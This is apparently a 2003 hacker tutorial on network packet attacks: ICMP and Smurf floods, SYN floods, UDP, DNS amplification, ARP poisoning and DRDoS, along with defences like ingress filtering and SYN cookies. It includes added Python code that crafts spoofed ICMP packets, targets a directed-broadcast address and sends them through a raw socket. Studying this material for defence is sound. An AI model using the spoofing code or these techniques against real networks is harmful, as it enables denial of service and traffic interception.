Packet Attacks v2
by Dreifachx and Data_Clast
PACKET ATTACKS - VERSION 1.1 (updated feb 25 2003)
Let me start by saying the internet is full of wonderful tools and papers like this one. A lot of these things can help you increase your knowledge, perhaps your job or more. But just as easily as you can learn from them, people read into them too much and decide to harm other people's work for no apparent reason. Let it be known that is in no way the purpose of this paper. A true hacker is one who strives to attain the answers for themselves through curiosity. It's the path we take to those answers that makes us hackers, not destruction of other people's work. So with that said, please enjoy my work, as I have enjoyed writing it.
The flow of data has always captured my interest. Just how does it work, how can we dissect it and use it to our advantage? Well, I have spent a long time studying all of this, and that is why I wrote this paper. It's a collection of run-on sentences on different packet attacks and how they work. Now we all know you can learn all you ever wanted to know about the specifications of a protocol by reading its 30 page RFC document. But that is the protocol according to design; in the wild it's a different story altogether. 'Packet Attacks' covers everything from basic DOS attacks to TCP/IP hijacking. Hence the name "Packet Attacks". This paper also focuses not just on attacks but practical ways to prevent such attacks and ideas on new methods to help us stop them and secure our networks.
Introduction
Well I assume most of you reading this paper already have a good understanding of TCP/IP and how it works so I won't get too much into detail on that, but I will scrape the surface on the parts we NEED to discuss. The internet is a MASSIVE web of machines all connected to one another through a series of hardware devices known as routers, switches, hubs, bridges and lots more. All of these devices (although some are smarter than others) push along packets. Our operating systems and applications craft these packets in order to send data to one another over the wire. Each packet, although varying in size, carries a small bit of data from one host to another. Each packet must also carry its own personal information such as where it came from and where it's headed. Of course there is a lot more to a packet than just this information. But as far as attacks go this is the crucial information we need to look at: nothing along the path verifies that the source address is telling the truth, and most of the attacks below rest on that. Now there are many many different types of protocols that craft many different types of packets. And they are all read differently when they are received at the other end. Whereas an ARP packet may ask which host on this subnet has a given IP address (and get back its MAC address), a TCP packet might transfer the last few bits in that MP3 you're downloading. Regardless of the data, all of these packets use the same wire to move to and from locations. I couldn't possibly discuss every protocol and packet structure in this one paper. The average end user takes for granted all of this running in the background while they surf the net. Most people don't understand the complexity of this internet we are all so familiar with, the chat rooms etc. But there are people who do, and there are people who take advantage of that. Reverse engineering has led to the creation of attacks using the basic fundamentals these protocols rely on. And since TCP/IP is so embedded in our infrastructure we must adapt and learn to defend against each new attack.
OSI MODEL
The Open Systems Interconnection model is a seven layered networking design. It's an industry standard reference that defines how data is handed from layer to layer, each layer talking to its peer on the other host. Not every protocol suite follows the OSI model exactly. TCP/IP, the internet's main mode of data transport, does not: it is usually described with four layers (link, internet, transport, application) that map only roughly onto the seven below. Let me take you through a brief overview of the OSI model.
Layer Seven : Application Layer
This layer is application specific: it provides everything from authentication to email to FTP and telnet, the list goes on. It's specifically for end user processes; what we input into our applications we can see on our screens.
Layer Six : Presentation Layer
This layer translates data between the form the application uses and the form sent on the wire: character encoding, compression and, where used, encryption and decryption. (You will understand what this means in a few minutes.)
Layer Five : Session Layer
Think of this layer as Establishment,
Control and Termination of the sessions formed by the
application(client) to a remote host(server).
Layer Four : Transport Layer
This layer is responsible for the end-to-end transfer of data between hosts, invisible to the application. It is there to ensure all data transfer goes accordingly: TCP adds reliability, sequencing and retransmission, UDP does not. The protocols used are UDP and TCP.
Layer Three : Network Layer
This layer is for logical addressing and routing: it moves packets from node to node across the different networks between two hosts. In TCP/IP this is IP (with ICMP riding on top of it). The error recovery and packet sequencing that keep a stream in order belong to TCP at the transport layer, not to this one.
Layer Two : Data Link Layer
This layer frames packets into bits so they are ready for the physical layer and decodes received bits back into frames. It also handles error detection on the physical link (the Ethernet frame check sequence). This layer is also divided into two different sub-layers, the LLC (logical link control) and MAC (media access control) sub-layers. The LLC sub-layer provides frame synchronization and error checking. The MAC sub-layer controls how a computer on your network gets access to the shared medium, and carries the hardware (MAC) addresses that ARP maps IP addresses onto.
Layer One : Physical Layer
This layer is the actual movement of the data. Using electrical impulses or some other form of signalling it pushes the bit stream towards the other host. This layer is the hardware level, the ethernet card, the wire etc. There are many standards within this layer.
You may ask yourself why I listed these from 7 to 1. Well I did to show you how the OSI model really works. Layer Seven really comes first: the end user types something into his instant messenger (for example) and the data flows down through the OSI model, being encapsulated with a new header at every level that has something to add. The data travels the wire and at the other end it moves back up the OSI model all the way back up to layer seven, where the other host can read it in the original form it was sent. So there's a VERY basic understanding of the OSI model and how it works to transmit data from host to host. There are a lot more protocols and parts to the OSI model but this basic representation should provide a firm understanding.
To understand all of this more in depth please get your hands on a few RFC (request for comment) documents and start reading. Because it will take you a very long time to understand exactly how TCP/IP works. If you're very knowledgeable in the way TCP/IP works then this paper should make a lot of sense to you, perhaps even bore you! :( On the other hand if you don't understand TCP/IP as well as you would like to, you still might get something out of this. I try and explain all of the technical writing as easily as I can. Feel free to email me if you have a question or comment. Thanks :)
Data_Clast
Chapter 1
The most common attack on the internet today is a denial of service attack. There are many programs on the internet today that will assist anyone in crafting one of these attacks. The sad part is, for as easy as they are to make, their power can be destructive when used properly. No matter what kind of packet attack it may be, most are based on the same principle: volume. Thousands and thousands of spoofed packets will eat up network resources within minutes, choking and essentially 'killing' any network. There are many types of packet attacks. Some are more sophisticated than others. I will also talk about TCP/IP hijacking and your typical port and vulnerability scans among other things.
Why do people launch these attacks? How are they launched? How do they exactly (technically speaking) 'choke a network'?! Hold tight, I'm getting to that. The lower end of these attacks are usually launched by what the hacker community calls a script kiddie. You see, a hacker isn't a mindless web defacing juvenile (please see the Mentor's manifesto). A hacker is a person of true intellect and would never craft such an attack for no reason. But these lower end attacks are usually launched at people's individual machines. Their IP addresses may come from an IRC chat room, Yahoo messenger, AOL, ICQ, or whatever other messenger you might use. Although not as sophisticated, these 'lower end' attacks can still knock an individual machine offline in minutes. The slightly more advanced attacks may be aimed at a business competitor in order to slow their sales or disrupt their outgoing internet connection. Whatever the reason may be, they are usually launched for a reason. Attacking a box for no reason is typically useless and will only take up your own bandwidth.
The more sophisticated attacks are aimed at government and root points of the internet, such as the attacks on the root DNS servers in October of 2002. These attacks were sophisticated in the way they were crafted. The attacks lasted for over an hour and successfully took out a few of the servers. If the attack had lasted just a few more minutes who knows the damage it could have caused. The possibility of the authorities solving these attacks and apprehending the offenders is slim to none because they are created and launched by skilled malicious individuals. They were also distributed denial of service attacks, which means the 'zombie' machines that attacked the servers were spread out all over the world. We will touch more on that later though.
You will learn more about how these individual attacks are crafted and how they work later in this paper, but this is a small introduction so you can get a vague idea. Creating spoofed packets requires a raw socket. A normal socket binds to an IP and a port and lets the kernel build the headers for you; a raw socket lets you hand the kernel a complete packet, headers included, to inject onto the wire, or receive raw packets without the kernel interpreting them. *NIX openly supports raw socket programming (there are many tutorials on this type of programming), which means you can code programs that create packets and then inject them into the network with ease. An example of this would be a program called "SENDIP" which allows you to create custom packets, and it supports many protocols (another good program is nemesis). I have written a few tutorials using SENDIP; I think it's a great program for both advanced and new network engineers to use. It will help you learn about packet structure and the different protocols it supports. Microsoft is not an open source company, which pretty much makes it even harder to find help in creating these sorts of programs for Windows. But it is possible to craft these attacks from within a Windows environment; it's referred to as 'Winsock' programming, using raw sockets through Winsock 2. (Later, Windows XP Service Pack 2 restricted this: raw sockets there can no longer send TCP segments, or UDP datagrams with a spoofed source address.) In fact most of these DDOS attacks are because of vulnerable Windows boxes out on the net. They are sitting ducks for trojan horses and other programs that craft these attacks on servers when commanded from a client program to do so. Most end users do not understand security and how easy it is to break into someone's home computer, so they lack firewalls and virus scanners. This leaves many zombie machines available at a hacker's disposal on the net. All one has to do is scan a class C subnet for open trojan ports, hack their way into those trojans and use them as a backdoor, and another zombie is created for attacking remote targets. Almost every program that interacts with TCP/IP generates packets to and from places; this is valid traffic. As you read you will distinguish the difference between valid and non-valid, as it is pretty easy to understand what I am explaining when I say "attack". When creating a raw socket and crafting spoofed packets these programs tell the kernel they are going to construct their own IP headers (on *NIX this is the IP_HDRINCL socket option). Usually this information is put on by the kernel before the packet leaves the machine. But in this instance we are telling the kernel we want to specify our own information, including the source address, and the kernel sends whatever we give it: nothing on the sending host checks that the source address is really ours, which is why spoofing is possible at all, unless the ISP's router filters it on the way out (RFC 2827 ingress filtering, which every ISP should be doing). Not all operating systems will allow this. And no, I don't have a detailed list of which do and which don't. Most of the experiments I have conducted on my network used different versions of RedHat Linux, Mandrake Linux, and Windows XP.
Chapter 2
There are several different types of packet attacks. There's the simple brute flood of ICMP packets which floods a network and eats up all the available bandwidth. And then there are more sophisticated attacks like the Smurf or SYN/ACK attack. All of these attacks target different things. While the Smurf attack may target the whole network it is attacking, the SYN/ACK attack targets a specific host or service running on a host. We also must take into consideration that when a target is attacked it may not be the only machine affected. There are many routers and other boxes transferring the data between point A and point B. Other people's legitimate data is flowing between them, and may be disrupted by the packet flood. Even a top of the line router can only handle so much data. And unfortunately it is very easy to obtain source code for these attacks all over the web. Let's take a more detailed look at each attack.
ICMP Brute Flood Attack
ICMP rides directly on top of IP (IP protocol number 1), alongside TCP and UDP, not on top of TCP. The ICMP protocol is simple yet very effective. It's used for error reporting and testing network connectivity. Your average PING program uses ICMP packets to test network connectivity. By sending a small amount of arbitrary data in an ECHO_REQUEST packet (type 8) it waits for an ECHO_REPLY (type 0) from the target host, simple right? A typical ping sends 4 or 5 of these at a target machine and every one that arrives is answered with an ECHO_REPLY carrying the same data back. That's when everything is done according to design. If you want more info on an ICMP packet and how it works then read my tutorial on that!
In this attack the source IP address is spoofed. So now hundreds, thousands of ECHO_REQUEST packets rush towards their destination. Point B must read and answer every one of them, so it burns CPU on the inbound packets and then spends its own upstream bandwidth sending an ECHO_REPLY for each one to whatever source address was in the packet, an address that either does not exist or belongs to somebody else who now receives replies they never asked for. Point B keeps no state for these the way it does for TCP connections; the damage is pure volume: every spoofed request costs the victim an inbound packet and an outbound reply. Now if these packets are coming from multiple source zombies (DDOS) then they are each coming from different routes. So even if one ISP stops one attack, there are still many more zombie machines attacking the victim. Eventually point B can no longer keep up with the ECHO_REQUESTs and its connection is completely flooded and of no use. On an unprotected system or router this attack can be very consuming. This attack is also sometimes referred to as a bandwidth attack. Even if the target is running an advanced firewall it cannot protect the wire it is connected to from being flooded with packets: they have already crossed the link by the time the firewall drops them, so the only real defense is upstream at the ISP (rate limiting ICMP, and ingress filtering so spoofed sources never leave their home network). There have been changes in this attack as well. On the net there are what we call amplifiers. Every network has a network address (.0 in a /24) and a directed-broadcast address (.255 in a /24). In many default configurations a router will forward an echo request sent to one of these addresses onto the segment as a broadcast, and every host on the segment answers it, so one request becomes as many replies as there are hosts, easily 4 or more and often dozens. So a zombie would send echo requests to a vulnerable network's broadcast address with a spoofed source IP, being the victim's real IP. So even though the traffic becomes valid as far as IP addresses go, the victim gets bombarded with massive volumes of ECHO_REPLY packets. You will see more of this description in other attacks, as it works for some of those too.
[zombie machine] --> ICMP ECHO_REQUEST (source IP = 1.1.1.1) -->-->--> [target]
[1.1.1.1 ???????] <-- ICMP ECHO_REPLY (destination 1.1.1.1 ?) <-- [target]
Hopefully that simple drawing shows you exactly how this attack works. It's very very simple: massive numbers of ICMP packets with spoofed addresses taking up network resources. The simplest of attacks.
Smurf Attack
The Smurf attack is the amplifier variant of the ICMP attack described above: echo requests with the victim's address as the spoofed source are sent to a network's directed-broadcast address, and every host on that network sends its ECHO_REPLY to the victim. The amplification factor is simply the number of hosts that answer the broadcast.
You can try this attack on your home network by simply opening a packet sniffer on each machine that is on. Pick a machine, any machine, and ping your broadcast address. Mine is 192.168.0.255. Immediately you see each machine receiving the broadcast packet and answering it. Now imagine it's several hundred requests and each one has a spoofed source IP address. It's a brute ICMP attack on a massive scale; the possibilities of this attack are endless. You could spoof the victim's real IP as your source IP and create massive volumes of legit ECHO_REPLY packets. Even though it's valid traffic, it's multiplied by the number of hosts on the amplifier network, easily 4x or more the load of the requests you send. This consumes the connection and valid traffic can't pass, or passes so slowly it makes no difference to the end user. The fix is on the amplifier's side: routers should refuse to forward directed broadcasts (on Cisco IOS, "no ip directed-broadcast", the default since IOS 12.0; RFC 2644 made this the required default for routers) and hosts should ignore echo requests sent to a broadcast address (on Linux, net.ipv4.icmp_echo_ignore_broadcasts=1).
[zombie machine] --> ICMP ECHO_REQUEST (source ip = 10.2.2.2) --> to: directed broadcast 4.1.0.255
[every host on 4.1.0.0/24 answers] --> ECHO_REPLY --> ECHO_REPLY --> ECHO_REPLY --> ECHO_REPLY --> [victim 10.2.2.2]
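Here is an added example, not code from the original paper or from sendip/nemesis, of what a packet crafting tool does under the hood for the raw socket passage in Chapter 1, the ICMP flood and the Smurf attack: it builds the IPv4 and ICMP headers itself (including the RFC 1071 checksums), puts any source address it likes in the IP header, and, on *NIX, hands the result to a raw socket with IP_HDRINCL so the kernel sends it unchanged. The same builder with the destination set to a network's directed-broadcast address produces the Smurf packet. The addresses and payload are constructed sample values; only send_raw() touches the network, and it needs root.

```python
"""Craft a spoofed ICMP echo request with a hand-built IPv4 header.

Added example (not from the original paper). Building and checksumming
run anywhere; send_raw() needs root/CAP_NET_RAW and a Linux raw socket.
Addresses and payload below are constructed sample values.
"""
import ipaddress
import socket
import struct


def internet_checksum(data: bytes) -> int:
    """RFC 1071: one's-complement sum of 16-bit words, complemented."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4_header(src: str, dst: str, payload_len: int,
                      proto: int = socket.IPPROTO_ICMP, ttl: int = 64, ident: int = 0x1234) -> bytes:
    """20-byte IPv4 header without options. The kernel normally fills this in;
    with IP_HDRINCL we supply it, so src can be anything at all (the spoof)."""
    ver_ihl = (4 << 4) | 5
    hdr = struct.pack("!BBHHHBBH4s4s", ver_ihl, 0, 20 + payload_len, ident, 0,
                      ttl, proto, 0, socket.inet_aton(src), socket.inet_aton(dst))
    return hdr[:10] + struct.pack("!H", internet_checksum(hdr)) + hdr[12:]


def build_icmp_echo_request(ident: int, seq: int, payload: bytes) -> bytes:
    """ICMP type 8 code 0; checksum covers the ICMP header and the payload."""
    hdr = struct.pack("!BBHHH", 8, 0, 0, ident, seq)
    return hdr[:2] + struct.pack("!H", internet_checksum(hdr + payload)) + hdr[4:] + payload


def build_spoofed_ping(src: str, dst: str, payload: bytes = b"packetattacks") -> bytes:
    """Complete IP packet claiming to come from src (which need not be ours)."""
    icmp = build_icmp_echo_request(ident=0xBEEF, seq=1, payload=payload)
    return build_ipv4_header(src, dst, len(icmp)) + icmp


def parse_ipv4(packet: bytes) -> dict:
    """Minimal decoder: what a sniffer on the wire would see, plus checksum checks."""
    f = struct.unpack("!BBHHHBBH4s4s", packet[:20])
    ihl = (f[0] & 0x0F) * 4
    return {
        "src": socket.inet_ntoa(f[8]), "dst": socket.inet_ntoa(f[9]),
        "proto": f[6], "total_len": f[2],
        "header_ok": internet_checksum(packet[:ihl]) == 0,   # valid header sums to 0
        "icmp_type": packet[ihl],
        "icmp_ok": internet_checksum(packet[ihl:]) == 0,
    }


def directed_broadcast(cidr: str) -> str:
    """The Smurf amplifier target: the subnet's directed-broadcast address.
    Every host that answers a request sent here turns it into one reply."""
    return str(ipaddress.ip_network(cidr, strict=False).broadcast_address)


def send_raw(packet: bytes) -> None:
    """Hand the finished packet to the kernel unchanged (IP_HDRINCL).
    Needs root/CAP_NET_RAW; not called by the example itself."""
    s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
    s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
    s.sendto(packet, (parse_ipv4(packet)["dst"], 0))
    s.close()


if __name__ == "__main__":
    # victim 10.2.2.2 as spoofed source, amplifier network's broadcast as target
    pkt = build_spoofed_ping("10.2.2.2", directed_broadcast("192.0.2.0/24"))
    print(parse_ipv4(pkt))
```

Note that nothing in build_ipv4_header asks whether "10.2.2.2" belongs to this machine; that check simply does not exist on the sending side, which is the whole reason ingress filtering at the ISP matters.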
SYN/ACK Attack
The SYN/ACK attack, usually called a SYN flood, is a very powerful attack. The SYN and ACK flags are also used in TCP hijacking, and in the TCP/IP three way handshake. When an application wants to connect with a server somewhere over the net via a TCP connection (connection-oriented, as opposed to connectionless data transfer (UDP)) it first sends a SYN packet. The SYN packet tells the target machine he wants to make a connection on a certain specified port, and carries the client's initial sequence number. When the target machine reads the SYN packet it replies to the original host with a single packet that has both the SYN and ACK flags set, carrying its own initial sequence number and an ack number equal to the client's sequence number plus one. These SEQ and ACK numbers are used to synchronize the data transfer: in case one or two packets get lost or slowed down along the route, the stream can be assembled again in the correct order. The original machine replies with a plain ACK acknowledging the server's sequence number, and then it starts to send data. When the server receives the first SYN it allocates a small piece of memory (an entry in the listening socket's backlog queue) to hold the half-open connection until the final ACK arrives. Now a SYN flood consists of spoofing the source IP address on the original SYN packets. The target receives the request for a connection, reads the spoofed source IP and sends its SYN/ACK to a destination that does not exist or will never answer. Most operating systems will retransmit the SYN/ACK several times if they don't receive a reply (Linux retries 5 times by default with doubling delays, so the entry lives for well over a minute), and only then give up and free the entry. So these tiny allocated spaces of memory are building up with every spoofed packet that arrives at the target, and the backlog queue, typically a few hundred to a few thousand entries, fills long before the link does. Once it is full the kernel drops new SYNs, legitimate ones included, so the attacker can disable a service on the target machine with a modest packet rate, without needing to eat all the available bandwidth the way the ICMP flood does. The standard defense is SYN cookies (RFC 4987): instead of storing the half-open connection, the server encodes what it needs into its own initial sequence number and reconstructs the connection when the final ACK comes back, so there is nothing for the flood to fill. So there is the SYN flood in a brief description.
[zombie machine] --> SYN (source IP 1.1.1.1, dest port = 23 telnet) (seq = 100) --> [target]
[1.1.1.1 ???????] <-- SYN/ACK (seq = 300) (ack = 101), retransmitted several times <-- [target]
As you can see from the simple drawing above the target machine has no idea who is really sending the SYN packets, and the telnet server it is running on port 23 stops accepting new connections once its backlog is full. Legitimate clients' SYNs are dropped, or their connections hang waiting, because the daemon cannot gather enough resources (backlog entries, memory, bandwidth) to complete the handshake amid all the spoofed packets.
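An added example (my code, not the paper's, and a simplified model rather than a real TCP stack) of the two halves of this section: a stateful listen backlog being filled by spoofed SYNs that never complete, and the stateless SYN cookie defense, where the server's initial sequence number is an HMAC over the connection 4-tuple and a time counter so the final ACK can be verified without anything having been stored. The backlog size, timeout, secret and addresses are assumed values; real kernels pack a 5-bit time counter and a 3-bit MSS index into the cookie as RFC 4987 describes, and the bit layout here is a simplification of that.

```python
"""SYN flood against a stateful backlog vs. stateless SYN cookies.

Added example, not from the original paper. Simplified model, not a TCP
stack; sizes, timeouts, addresses and the secret are constructed values.
"""
import hashlib
import hmac
import random
from collections import OrderedDict

SECRET = b"constructed per-boot secret"  # assumed; a kernel draws this at boot


class Backlog:
    """Stateful listener: one entry per half-open connection, kept until the
    client's final ACK arrives or the SYN/ACK retransmissions time out."""

    def __init__(self, size: int, timeout: float):
        self.size, self.timeout = size, timeout
        self.half_open = OrderedDict()  # (src, sport) -> (server_isn, expires_at)
        self.dropped = 0

    def on_syn(self, src: str, sport: int, now: float) -> bool:
        """Return True if a SYN/ACK is sent; False if the queue is full."""
        self.expire(now)
        if (src, sport) not in self.half_open and len(self.half_open) >= self.size:
            self.dropped += 1  # the denial of service: no SYN/ACK at all
            return False
        self.half_open[(src, sport)] = (random.getrandbits(32), now + self.timeout)
        return True

    def on_ack(self, src: str, sport: int, ack: int, now: float) -> bool:
        """Third handshake packet: accepted only if it matches a stored ISN."""
        entry = self.half_open.pop((src, sport), None)
        return entry is not None and ack == (entry[0] + 1) & 0xFFFFFFFF

    def expire(self, now: float) -> None:
        for key in [k for k, (_, t) in self.half_open.items() if t <= now]:
            del self.half_open[key]


def syn_flood(backlog: Backlog, n_syns: int, rate_per_sec: float, start: float = 0.0) -> float:
    """Spoofed SYNs from random sources that will never ACK; returns end time."""
    for i in range(n_syns):
        src = ".".join(str(random.randrange(1, 254)) for _ in range(4))
        backlog.on_syn(src, random.randrange(1024, 65535), start + i / rate_per_sec)
    return start + n_syns / rate_per_sec


def syn_cookie(src: str, sport: int, dst: str, dport: int, minute: int, mss_idx: int = 0) -> int:
    """Stateless server ISN: 5-bit time counter | 3-bit MSS index | 24-bit MAC
    over the 4-tuple and that counter. Nothing is stored on the server."""
    m = minute & 0x1F
    msg = f"{src}:{sport}>{dst}:{dport}@{m}".encode()
    mac = int.from_bytes(hmac.new(SECRET, msg, hashlib.sha256).digest()[:3], "big")
    return (m << 27) | ((mss_idx & 0x7) << 24) | mac


def check_cookie_ack(src: str, sport: int, dst: str, dport: int, ack: int, now_minute: int) -> bool:
    """Rebuild the cookie from the ACK and the 4-tuple; accept if it matches
    and was issued this minute or the previous one. No lookup, no table."""
    cookie = (ack - 1) & 0xFFFFFFFF
    m, mss_idx = cookie >> 27, (cookie >> 24) & 0x7
    if ((now_minute & 0x1F) - m) & 0x1F > 1:
        return False  # too old, or a forged counter
    return syn_cookie(src, sport, dst, dport, m, mss_idx) == cookie


def demo() -> dict:
    """25 seconds of spoofed SYNs at 200/s against a 128-entry backlog, then a
    real client; then the same client served statelessly with a cookie."""
    random.seed(1)
    b = Backlog(size=128, timeout=60.0)
    end = syn_flood(b, n_syns=5000, rate_per_sec=200)
    refused = not b.on_syn("203.0.113.9", 40000, end)
    cookie = syn_cookie("203.0.113.9", 40000, "192.0.2.10", 80, minute=7)
    return {"half_open": len(b.half_open), "dropped": b.dropped, "legit_refused": refused,
            "cookie_ok": check_cookie_ack("203.0.113.9", 40000, "192.0.2.10", 80, cookie + 1, 7)}


if __name__ == "__main__":
    print(demo())
```

The point of the cookie half is that check_cookie_ack() consults no table at all: a flood of a million spoofed SYNs costs the server a million SYN/ACKs of bandwidth but zero memory, and the first real client still gets through.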
Another use of spoofed TCP packets is to disconnect a user from their current TCP session, by spoofing packets to a server from the address of a client it is currently talking to. An attacker would set the "FIN" flag in the packet, which tells the server the client is done sending data, or the "RST" flag, which tears the connection down on the spot. The catch is that the server only honours the packet if its sequence number falls inside the window it currently expects from the client, so the attacker needs to know or guess the live sequence numbers (easy when sniffing on the same LAN, hard blind). The client loses his connection and the attacker walks away undetected, because it only took one packet to accomplish this.
UDP Attack
UDP is a protocol that is used to transfer data, short for User Datagram Protocol. UDP offers no connection setup, no retransmission and no ordering; each datagram stands alone, so it is used where that is acceptable or where the application handles it itself (DNS, streaming media, many games, and broadcast messages on a LAN). It doesn't require the 3 way handshake such as the SYN/ACK method, so there is no backlog to fill and its initial attack may not take down a remote daemon as quickly. A UDP attack would consist of spoofing the source IP addresses and specifying a port number like in the SYN attack above; the damage is bandwidth, plus whatever CPU the listening service spends on each datagram. A datagram can carry up to 65,507 bytes of payload, and anything bigger than the link MTU (1500 bytes on Ethernet) gets fragmented by IP (broken up, with each fragment flagged with its offset in the original so the receiving end can reassemble it), so a flood of large datagrams also forces the victim to hold partial fragments in memory while it waits for the rest. For example in Windows 2000 there was a remote UDP DOS exploit that used the IKE service running on port 500. All an attacker had to do was send a steady stream of large UDP packets (above 500 bytes) to port 500 on a machine that had it open, and the CPU usage would hit 99% and the machine would lock up. The typical ports that accept UDP packets on a Windows box with the Simple TCP/IP Services installed are 7 (echo), 13 (daytime), 19 (chargen) and 37 (time). Echo and chargen answer every datagram with one of their own, so a single spoofed datagram from port 19 of host A to port 7 of host B sets the two services bouncing traffic at each other indefinitely (the classic chargen/echo ping-pong attack); these services should simply be disabled.
DNS Attack
The DNS attack is a special one. Not as easily crafted as the others, there aren't that many tools readily available to the average script kiddie to construct such an attack. The DNS protocol is used for name resolution, 216.239.35.100 = google.com, simple as that? Well not really. A DNS attack is based on the fact that a DNS query takes very little data and bandwidth to create (a query for one name is a few dozen bytes of UDP), but a DNS response is much bigger, especially for a query type like ANY or for a name with many records, and because DNS runs over UDP the server answers to whatever source address the query claimed. So this is how a DNS attack would look like.
10.10.10.10 = victim's IP
[attacker] --> [dns query packet (who is google.com?), source IP is 10.10.10.10] --> [dns server]
[dns server] --> [dns response] [dns response] [dns response] --> [victim 10.10.10.10]
As you can see the attack is sort of relayed from a legitimate DNS server. Although the DNS response packets are 'legit' there is a massive flood of them, because the DNS server that is sending them is a very good machine on a very good connection, and each response is several times the size of the query that triggered it. The end user, most likely a home PC, gets flooded with these huge DNS response packets it never asked for. The defenses are, again, at the source and at the reflector: ingress filtering so the spoofed queries never leave the attacker's network, and DNS servers that only answer recursive queries from their own clients instead of from the whole internet.
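An added example, not from the paper, that makes the size asymmetry concrete: it builds a real wire-format DNS query (RFC 1035) for google.com, constructs a plausible response with several records the way a server would return it (owner names compressed to a pointer back at the question), parses it as the victim's stack would, and reports the amplification factor, the bytes the reflector sends to the victim per byte the attacker spent. The records and addresses are made-up sample data, and the response builder exists only so the example runs offline.

```python
"""DNS reflection/amplification measured on the wire format.

Added example, not from the original paper; the response and its records
are constructed sample data (RFC 5737 documentation addresses).
"""
import struct


def encode_name(name: str) -> bytes:
    """'google.com' -> b'\\x06google\\x03com\\x00' (RFC 1035 labels)."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def build_query(name: str, qtype: int = 1, txid: int = 0x1234) -> bytes:
    """12-byte header (RD set, one question) + QNAME + QTYPE + QCLASS IN.
    Inside UDP/IP with the victim as source, this is all the attacker sends."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)


def skip_name(msg: bytes, off: int) -> int:
    """Offset just past a name, handling compression pointers (0xC0xx)."""
    while True:
        length = msg[off]
        if length == 0:
            return off + 1
        if length & 0xC0 == 0xC0:
            return off + 2  # a pointer is 2 bytes and terminates the name
        off += 1 + length


def parse_message(msg: bytes) -> dict:
    """Walk header, question and every resource record; report what the
    receiver sees: answer count, record types/TTL/RDATA and packet size."""
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    off = 12
    for _ in range(qd):
        off = skip_name(msg, off) + 4  # QTYPE + QCLASS
    records = []
    for _ in range(an + ns + ar):
        off = skip_name(msg, off)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        records.append((rtype, ttl, msg[off:off + rdlen]))
        off += rdlen
    return {"txid": txid, "is_response": bool(flags & 0x8000),
            "answers": an, "records": records, "bytes": len(msg)}


def txt_rdata(text: str) -> bytes:
    """TXT RDATA: one or more <length><chars> strings of at most 255 bytes."""
    data = text.encode("ascii")
    return b"".join(bytes([len(data[i:i + 255])]) + data[i:i + 255]
                    for i in range(0, len(data), 255))


def build_response(query: bytes, rdatas: list) -> bytes:
    """Constructed answer: same txid, QR/RD/RA flags, question echoed back,
    then one record per (type, rdata) with its name compressed to offset 12."""
    txid = struct.unpack("!H", query[:2])[0]
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, len(rdatas), 0, 0)
    body = b"".join(b"\xc0\x0c" + struct.pack("!HHIH", rtype, 1, 300, len(rd)) + rd
                    for rtype, rd in rdatas)
    return header + query[12:] + body


def amplification(query: bytes, response: bytes) -> float:
    """Bytes the reflector sends the victim per byte the attacker sent."""
    return len(response) / len(query)


# Constructed sample: eight A records plus a long TXT record, the sort of
# answer an ANY query (qtype 255) draws out of a server.
QUERY = build_query("google.com", qtype=255)
RESPONSE = build_response(
    QUERY,
    [(1, bytes([203, 0, 113, 10 + i])) for i in range(8)]
    + [(16, txt_rdata("v=spf1 " + "ip4:203.0.113.0/24 " * 10 + "-all"))])

if __name__ == "__main__":
    print(parse_message(RESPONSE)["answers"], "records,",
          "amplification x%.1f" % amplification(QUERY, RESPONSE))
```

Real-world factors are larger still once EDNS0 lets responses exceed 512 bytes and DNSSEC adds signatures, which is why the same parser is useful for measuring what your own resolver will hand an attacker.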
ARP Attack
The ARP attack is a special one; it can be used to 'hijack' a TCP connection currently in session or it can be used to sniff the legitimate traffic between two other machines on your segment. Which is a very dangerous thing in the information world we live in today. There are a few methods of this attack. Let's say person1, attacker, and server are all on the same subnet. Person1 and server currently have an FTP session open. ARP is how a host learns which MAC address to put on frames for a given IP address, and hosts cache the answers without checking who sent them or whether they ever asked. Attacker sends person1 an ARP reply claiming that the server's IP address is at the attacker's MAC address, and sends server an ARP reply claiming that person1's IP address is at the attacker's MAC address. Now both of their ARP tables are poisoned: server and person1 still address their packets to each other's IP, but the frames carrying them go to the attacker's MAC, that is, to the attacker. So in this case the attacker has a sniffer set up and he's collecting a ton of data, forwarding the frames on to their real owners so nobody notices. Now the attacker (an advanced one at that) can issue commands as person1 to the server. ARP never crosses a router, so this only works on a LAN, but there it's very easy. A poisoned entry lasts until the cache times out or the real host's next ARP reply overwrites it (anywhere from tens of seconds to many minutes depending on the OS), so the attacker simply re-sends the forged replies every few seconds to keep it in place.
DRDOS Attack
A DRDOS attack uses a little of the other attacks to inflict damage. This attack spoofs the source IP address of SYN packets to the IP of the victim. It requires a third party. This is the part of the attack that makes it so easy. All it needs is some FTP, web server, telnet... ANY TCP service that will reply with a SYN/ACK, anywhere on the internet. Could be Angelfire's free FTP servers, could be your neighbor's web server running off his 233mhz Compaq with IIS 4.0. It doesn't matter! The SYN packets are sent to that service's IP address and it of course replies with a steady stream of SYN/ACK packets to the victim, directed at whatever port the attacker chose on the victim's machine, eating its bandwidth (and, if that port is closed, making it spend more CPU sending RSTs back). These attacks are near impossible to track down, because the packets the victim sees genuinely come from the reflector, and the reflector only ever saw the spoofed source. This attack is quite possibly the strongest DOS attack in my opinion. For every SYN packet you send the middle man, it sends the SYN/ACK to the victim and then retransmits it several times (typically 3 to 5) when no ACK comes back, so the reflector does the attacker's repeating for him. This allows the attacker to construct a massive attack from just one machine with a broadband connection. There are more dangers to this attack as well; there are hundreds of thousands of FTP, web servers and many more services running on the net today that will deflect these SYN/ACK packets at the victim. So in theory this attack could use any number of 'middle man' servers to bombard your network with packets. It is also why the victim's only real chance of tracing the source is the attacker's ISP applying ingress filtering so the spoofed SYNs never get out in the first place.
